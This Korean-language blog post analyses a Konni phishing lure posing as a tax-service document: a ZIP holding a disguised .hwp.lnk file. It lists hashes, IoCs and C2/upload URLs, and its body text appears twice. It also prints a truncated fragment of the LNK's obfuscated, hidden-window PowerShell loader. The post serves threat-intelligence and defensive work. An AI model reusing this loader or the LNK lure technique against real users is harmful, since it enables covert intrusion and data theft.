Konni(코니) 에서 만든 국세청 사칭 악성코드-첨부1.취득자금 소명대상 금액의 출처 확인서(국제조세조정에 관한 법률 시행규칙).hwp(2023.12.13)
Contents
오늘은 북한 해킹 단체 Konni(코니) 에서 첨부1.취득자금 소명대상 금액의 출처 확인서(국제조세조정에 관한 법률 시행규칙) 사칭한 악성코드에 대해 글을 적어 보겠습니다.
2017년 Cisco Talos 연구원이 처음 발견했으며, 2014년부터 탐지되지 않은 채 고도의 타깃 공격으로 하는 북한의 해킹 단체 Thallium, APT37과 관련된 해킹 단체이며 Kimsuky(김수키)일 가능성도 있는 단체입니다. 일단 기본적으로 미끼(Decoy) 문서를 사용자에게 표시한 다음 피해자 컴퓨터에서 악성 파일을 실행합니다.
보통은 한글과 컴퓨터에서 만들어서 배포하는 포멧인 hwp에서는 악성코드가 없겠지 생각을 하지만 해당 포멧을 자주 이용하고 있으며 먼저 압축 파일 해쉬값은 다음과 같습니다.
파일명:첨부1.취득자금 소명대상 금액의 출처 확인서(국제조세조정에 관한 법률 시행규칙).zip
사이즈:160 KB
MD5:7a86930567749d349e87b7523da26a39
SHA-1:fab8d2d22d264c9b0e0d62ea311b87575038859f
SHA-256:0ae016988c0d234f0c5ee4a003653c115e4cb748fcb60e61938da1a85c3b5760
이며 해당 압축 파일로 압축된 파일을 풀고 나면 다음과 같은 lnk 파일을 확인할 수가 있습니다.
파일명: 첨부1. 취득자금 소명대상 금액의 출처 확인서(국제조세조정에 관한 법률 시행규칙).hwp.lnk
사이즈:66.8 MB
MD5:ceb4847592b0b9ddc2b9c239fa48c471
SHA-1:c459315c5a7c4e014867d8e27b1209c6de7f2fa2
SHA-256:fbdc74e4a2733561fa077873a008e9aba4cf1415af1c6aaea2d8cb3ab435ddad
일단 악성코드에 포함된 Power Shell 스크립트는 다음과 같습니다.
/c p^owe^(r)she^l^l -wi(n)dowstyle hidden function BYPVVObtSB(g){param($vOiCAahtou(,)$YTMhzLrhzIP(V),$ODtnd(l)eakm, $MqCNDx(m)eLr,$fNjGFHMrbWA);^<#(l)etch overneg(l)igently tran(s)actinide#^> $jpgrvG(K)usY=New(-)Object ^<#torn(e)se ungospelized nondesignate#^> System(.)IO.FileStream($vOiCAa(h)tou,^<#uncross trac(e)less bonita#^> [System.IO(.)FileMode]::Open,^(<)#sp(a)smotin aborigine panzootic#^> [System(.)IO.File(A)ccess]::Read);^<#wari(a)ngle aristol(o)chiaceous fictioneering(#)^> $jpgrvGKu(s)Y.Seek($YTMhzL(r)hzIPV,^<#quips(o)meness stercoral unde(c)eptitious#^> [System.IO(.)SeekOrigin]::Begin);^<#marc(h)antia oversoar dupl(i)cature#^> $VJOInKKX(M)RvQ=New-Object ^<#limnobi(u)m benzoic reefed#^>by(t)e[] $OD(t)ndleakm; ^<#refr(i)es …
2017년 Cisco Talos 연구원이 처음 발견했으며, 2014년부터 탐지되지 않은 채 고도의 타깃 공격으로 하는 북한의 해킹 단체 Thallium, APT37과 관련된 해킹 단체이며 Kimsuky(김수키)일 가능성도 있는 단체입니다. 일단 기본적으로 미끼(Decoy) 문서를 사용자에게 표시한 다음 피해자 컴퓨터에서 악성 파일을 실행합니다.
보통은 한글과 컴퓨터에서 만들어서 배포하는 포멧인 hwp에서는 악성코드가 없겠지 생각을 하지만 해당 포멧을 자주 이용하고 있으며 먼저 압축 파일 해쉬값은 다음과 같습니다.
파일명:첨부1.취득자금 소명대상 금액의 출처 확인서(국제조세조정에 관한 법률 시행규칙).zip
사이즈:160 KB
MD5:7a86930567749d349e87b7523da26a39
SHA-1:fab8d2d22d264c9b0e0d62ea311b87575038859f
SHA-256:0ae016988c0d234f0c5ee4a003653c115e4cb748fcb60e61938da1a85c3b5760
이며 해당 압축 파일로 압축된 파일을 풀고 나면 다음과 같은 lnk 파일을 확인할 수가 있습니다.
파일명: 첨부1. 취득자금 소명대상 금액의 출처 확인서(국제조세조정에 관한 법률 시행규칙).hwp.lnk
사이즈:66.8 MB
MD5:ceb4847592b0b9ddc2b9c239fa48c471
SHA-1:c459315c5a7c4e014867d8e27b1209c6de7f2fa2
SHA-256:fbdc74e4a2733561fa077873a008e9aba4cf1415af1c6aaea2d8cb3ab435ddad
일단 악성코드에 포함된 Power Shell 스크립트는 다음과 같습니다.
/c p^owe^(r)she^l^l -wi(n)dowstyle hidden function BYPVVObtSB(g){param($vOiCAahtou(,)$YTMhzLrhzIP(V),$ODtnd(l)eakm, $MqCNDx(m)eLr,$fNjGFHMrbWA);^<#(l)etch overneg(l)igently tran(s)actinide#^> $jpgrvG(K)usY=New(-)Object ^<#torn(e)se ungospelized nondesignate#^> System(.)IO.FileStream($vOiCAa(h)tou,^<#uncross trac(e)less bonita#^> [System.IO(.)FileMode]::Open,^(<)#sp(a)smotin aborigine panzootic#^> [System(.)IO.File(A)ccess]::Read);^<#wari(a)ngle aristol(o)chiaceous fictioneering(#)^> $jpgrvGKu(s)Y.Seek($YTMhzL(r)hzIPV,^<#quips(o)meness stercoral unde(c)eptitious#^> [System.IO(.)SeekOrigin]::Begin);^<#marc(h)antia oversoar dupl(i)cature#^> $VJOInKKX(M)RvQ=New-Object ^<#limnobi(u)m benzoic reefed#^>by(t)e[] $OD(t)ndleakm; ^<#refr(i)es …
IoC
0ae016988c0d234f0c5ee4a003653c115e4cb748fcb60e61938da1a85c3b5760
7a86930567749d349e87b7523da26a39
c459315c5a7c4e014867d8e27b1209c6de7f2fa2
ceb4847592b0b9ddc2b9c239fa48c471
fab8d2d22d264c9b0e0d62ea311b87575038859f
fbdc74e4a2733561fa077873a008e9aba4cf1415af1c6aaea2d8cb3ab435ddad
http://ddsdata.net/upload.php
https://aufildeseaux.com/wp-admin/includes/main/read/
https://aufildeseaux.com/wp-admin/includes/main/read/get.php
7a86930567749d349e87b7523da26a39
c459315c5a7c4e014867d8e27b1209c6de7f2fa2
ceb4847592b0b9ddc2b9c239fa48c471
fab8d2d22d264c9b0e0d62ea311b87575038859f
fbdc74e4a2733561fa077873a008e9aba4cf1415af1c6aaea2d8cb3ab435ddad
http://ddsdata.net/upload.php
https://aufildeseaux.com/wp-admin/includes/main/read/
https://aufildeseaux.com/wp-admin/includes/main/read/get.php